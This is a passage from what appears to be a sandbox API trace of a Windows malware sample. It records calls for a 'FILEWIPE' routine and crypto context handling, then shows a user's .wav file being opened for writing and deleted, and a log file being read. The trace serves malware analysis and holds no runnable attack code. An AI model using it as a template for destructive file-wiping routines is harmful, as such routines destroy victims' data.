wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.478] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.478] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.478] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0187.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.478] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.478] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0187.478] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.479] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.479] FreeLibrary (hLibModule=0x74f20000) returned 1 [0187.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0187.479] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0187.479] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.479] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.479] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.480] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.483] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.483] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0187.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0187.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.484] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf356ccc0, ftCreationTime.dwHighDateTime=0x1d5e47b, ftLastAccessTime.dwLowDateTime=0x91c4fd00, ftLastAccessTime.dwHighDateTime=0x1d5e17f, ftLastWriteTime.dwLowDateTime=0x91c4fd00, ftLastWriteTime.dwHighDateTime=0x1d5e17f, nFileSizeHigh=0x0, nFileSizeLow=0x10526, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Xxiiq96uF_.wav", cAlternateFileName="XXIIQ9~1.WAV")) returned 0x90af58 [0187.484] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0187.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.484] CharLowerBuffW (in: lpsz="byte[66854]", cchLength=0xb | out: lpsz="byte[66854]") returned 0xb [0187.485] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.485] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0187.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.486] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.486] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0187.486] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0187.486] FreeLibrary (hLibModule=0x75c90000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.487] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.487] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.487] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.487] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0187.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.488] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0187.488] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.488] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\xxiiq96uf_.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0187.489] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.489] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.489] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.489] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0187.489] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.489] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.490] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.490] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.490] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.490] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.490] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.490] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0187.490] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.490] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.490] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.490] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.490] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.490] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.490] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav", lpFilePart=0x0) returned 0x57 [0187.491] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf356ccc0, ftCreationTime.dwHighDateTime=0x1d5e47b, ftLastAccessTime.dwLowDateTime=0x91c4fd00, ftLastAccessTime.dwHighDateTime=0x1d5e17f, ftLastWriteTime.dwLowDateTime=0x14fb8220, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10526, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Xxiiq96uF_.wav", cAlternateFileName="XXIIQ9~1.WAV")) returned 0x90af58 [0187.492] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\xxiiq96uf_.wav")) returned 1 [0187.494] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf356ccc0, ftCreationTime.dwHighDateTime=0x1d5e47b, ftLastAccessTime.dwLowDateTime=0x91c4fd00, ftLastAccessTime.dwHighDateTime=0x1d5e17f, ftLastWriteTime.dwLowDateTime=0x14fb8220, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10526, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Xxiiq96uF_.wav", cAlternateFileName="XXIIQ9~1.WAV")) returned 0 [0187.494] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.494] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.494] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0187.495] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.495] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.495] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0187.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0187.495] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0187.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.496] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0187.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0187.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0187.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0187.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.496] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0187.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.496] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0187.497] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.497] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0187.497] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.497] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.498] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0187.498] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x27e1, lpOverlapped=0x0) returned 1 [0187.499] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0187.499] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x27e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 